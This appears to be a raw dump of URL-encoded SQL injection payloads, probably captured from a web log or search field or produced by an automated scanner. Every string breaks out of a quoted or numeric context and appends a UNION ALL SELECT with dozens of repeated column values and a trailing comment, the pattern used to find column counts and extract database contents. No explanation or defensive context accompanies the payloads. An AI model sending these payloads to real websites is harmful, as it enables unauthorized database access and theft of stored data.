-2052%27%20%7C%7C%20%28SELECT%208378%20WHERE%208809%3D8809%20UNION%20ALL%20SELECT%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%23%20%29%20%7C%7C%20%27 -6757%27%20%7C%7C%20%28SELECT%203046%20WHERE%208332%3D8332%20UNION%20ALL%20SELECT%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%23%20%29%20%7C%7C%20%27 -4196%27%20%7C%7C%20%28SELECT%206557%20WHERE%207328%3D7328%20UNION%20ALL%20SELECT%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%2C%207328%23%20%29%20%7C%7C%20%27 -2922%20%2B%20%28SELECT%207152%20FROM%20DUAL%20WHERE%202368%3D2368%20UNION%20ALL%20SELECT%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%2C%202368%23%20%29 -3005%20%2B%20%28SELECT%201700%20FROM%20DUAL%20WHERE%204080%3D4080%20UNION%20ALL%20SELECT%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%2C%204080%23%20%29 -1619%20%2B%20%28SELECT%201378%20FROM%20DUAL%20WHERE%205813%3D5813%20UNION%20ALL%20SELECT%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%2C%205813%23%20%29 -7205%20%2B%20%28SELECT%207801%20FROM%20DUAL%20WHERE%206000%3D6000%20UNION%20ALL%20SELECT%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%2C%206000%23%20%29 -6873%20%2B%20%28SELECT%206851%20FROM%20DUAL%20WHERE%208872%3D8872%20UNION%20ALL%20SELECT%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%2C%208872%23%20%29 -3018%20%2B%20%28SELECT%202271%20FROM%20DUAL%20WHERE%203279%3D3279%20UNION%20ALL%20SELECT%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%2C%203279%23%20%29 -5451%20%2B%20%28SELECT%208923%20FROM%20DUAL%20WHERE%202287%3D2287%20UNION%20ALL%20SELECT%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%2C%202287%23%20%29 -1756%20%2B%20%28SELECT%203030%20FROM%20DUAL%20WHERE%209592%3D9592%20UNION%20ALL%20SELECT%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%23%20%29 -2810%20%2B%20%28SELECT%207624%20FROM%20DUAL%20WHERE%209755%3D9755%20UNION%20ALL%20SELECT%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%2C%209755%23%20%29 -9840%20%2B%20%28SELECT%203202%20FROM%20DUAL%20WHERE%204934%3D4934%20UNION%20ALL%20SELECT%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%2C%204934%23%20%29 -9552%20%2B%20%28SELECT%208423%20WHERE%206735%3D6735%20UNION%20ALL%20SELECT%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%2C%206735%23%20%29 -3366%20%2B%20%28SELECT%202485%20WHERE%202701%3D2701%20UNION%20ALL%20SELECT%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%2C%202701%23%20%29 -4316%20%2B%20%28SELECT%203444%20WHERE%205307%3D5307%20UNION%20ALL%20SELECT%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%23%20%29 -7554%20%2B%20%28SELECT%203045%20WHERE%206040%3D6040%20UNION%20ALL%20SELECT%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%2C%206040%23%20%29 -5990%20%2B%20%28SELECT%207562%20WHERE%205275%3D5275%20UNION%20ALL%20SELECT%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%23%20%29 -8099%20%2B%20%28SELECT%203872%20WHERE%204249%3D4249%20UNION%20ALL%20SELECT%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%2C%204249%23%20%29 -1488%20%2B%20%28SELECT%205381%20WHERE%204872%3D4872%20UNION%20ALL%20SELECT%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%23%20%29 -3607%20%2B%20%28SELECT%208683%20WHERE%207970%3D7970%20UNION%20ALL%20SELECT%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%2C%207970%23%20%29 -6827%20%2B%20%28SELECT%208164%20WHERE%206754%3D6754%20UNION%20ALL%20SELECT%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%2C%206754%23%20%29 -7619%20%2B%20%28SELECT%202152%20WHERE%202500%3D2500%20UNION%20ALL%20SELECT%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%2C%202500%23%20%29 -3542%27%20%2B%20%28SELECT%20%27JOlI%27%20FROM%20DUAL%20WHERE%201002%3D1002%20UNION%20ALL%20SELECT%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%23%20%29%20%2B%20%27 -8597%27%20%2B%20%28SELECT%20%27XjpH%27%20FROM%20DUAL%20WHERE%205153%3D5153%20UNION%20ALL%20SELECT%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%2C%205153%23%20%29%20%2B%20%27 -3227%27%20%2B%20%28SELECT%20%27kjZW%27%20FROM%20DUAL%20WHERE%203564%3D3564%20UNION%20ALL%20SELECT%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%23%20%29%20%2B%20%27 -4143%27%20%2B%20%28SELECT%20%27mJRg%27%20FROM%20DUAL%20WHERE%201857%3D1857%20UNION%20ALL%20SELECT%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%23%20%29%20%2B%20%27 -6790%27%20%2B%20%28SELECT%20%27YFYm%27%20FROM%20DUAL%20WHERE%204345%3D4345%20UNION%20ALL%20SELECT%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%23%20%29%20%2B%20%27 -2610%27%20%2B%20%28SELECT%20%27gckb%27%20FROM%20DUAL%20WHERE%203365%3D3365%20UNION%20ALL%20SELECT%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%2C%203365%23%20%29%20%2B%20%27 -7360%27%20%2B%20%28SELECT%20%27gUdU%27%20FROM%20DUAL%20WHERE%204379%3D4379%20UNION%20ALL%20SELECT%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%2C%204379%23%20%29%20%2B%20%27 -2974%27%20%2B%20%28SELECT%20%27DFRS%27%20FROM%20DUAL%20WHERE%203942%3D3942%20UNION%20ALL%20SELECT%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%23%20%29%20%2B%20%27 -1135%27%20%2B%20%28SELECT%20%27GQeB%27%20FROM%20DUAL%20WHERE%209311%3D9311%20UNION%20ALL%20SELECT%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%23%20%29%20%2B%20%27 -6512%27%20%2B%20%28SELECT%20%27YZty%27%20FROM%20DUAL%20WHERE%209806%3D9806%20UNION%20ALL%20SELECT%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%2C%209806%23%20%29%20%2B%20%27 -5635%27%20%2B%20%28SELECT%20%27wRNy%27%20WHERE%209207%3D9207%20UNION%20ALL%20SELECT%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%23%20%29%20%2B%20%27 -5361%27%20%2B%20%28SELECT%20%27wQno%27%20WHERE%201114%3D1114%20UNION%20ALL%20SELECT%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%2C%201114%23%20%29%20%2B%20%27 -3456%27%20%2B%20%28SELECT%20%27vLGf%27%20WHERE%204366%3D4366%20UNION%20ALL%20SELECT%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%23%20%29%20%2B%20%27 -6168%27%20%2B%20%28SELECT%20%27eTpl%27%20WHERE%205537%3D5537%20UNION%20ALL%20SELECT%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%2C%205537%23%20%29%20%2B%20%27 -6990%27%20%2B%20%28SELECT%20%27TObO%27%20WHERE%201280%3D1280%20UNION%20ALL%20SELECT%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%2C%201280%23%20%29%20%2B%20%27 -8685%27%20%2B%20%28SELECT%20%27ctAA%27%20WHERE%204754%3D4754%20UNION%20ALL%20SELECT%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%2C%204754%23%20%29%20%2B%20%27 -3326%27%20%2B%20%28SELECT%20%27RlPX%27%20WHERE%207057%3D7057%20UNION%20ALL%20SELECT%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%2C%207057%23%20%29%20%2B%20%27 -1476%27%20%2B%20%28SELECT%20%27iVQf%27%20WHERE%207314%3D7314%20UNION%20ALL%20SELECT%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%2C%207314%23%20%29%20%2B%20%27 -9507%27%20%2B%20%28SELECT%20%27zvpf%27%20WHERE%209107%3D9107%20UNION%20ALL%20SELECT%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%2C%209107%23%20%29%20%2B%20%27 -2373%27%20%2B%20%28SELECT%20%27cmCJ%27%20WHERE%205927%3D5927%20UNION%20ALL%20SELECT%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%2C%205927%23%20%29%20%2B%20%27 -8496%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%2C%202062%23%20%23 